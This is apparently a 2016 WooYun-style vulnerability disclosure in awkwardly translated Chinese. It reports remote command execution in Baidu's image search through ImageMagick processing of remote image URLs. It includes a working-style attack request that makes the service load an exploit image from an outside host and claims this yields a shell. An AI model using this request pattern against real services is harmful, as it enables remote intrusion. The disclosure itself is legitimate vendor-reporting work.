漏洞标题 百度远程命令执行漏洞 相关制造商 百度 漏洞作者 数据流 提交时间 2016-05-05 13: 35 公共时间 2016-06-20 18: 10 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 在百度地图手机版 http://shitu.baidu.com/ Imagick不处理上传图像，但直接使用远程图像URL支持图像识别 直接加载远程exp图片 http://shitu.baidu.com/n/searchpc?queryImageUrl=http%3A%2F%2F115browser.com%2Fexp1.png 直接炮弹 漏洞证明： 在支持远程图像读取的地方可能会出现问题 修理计划： 版权声明：请注明数据流@乌云的来源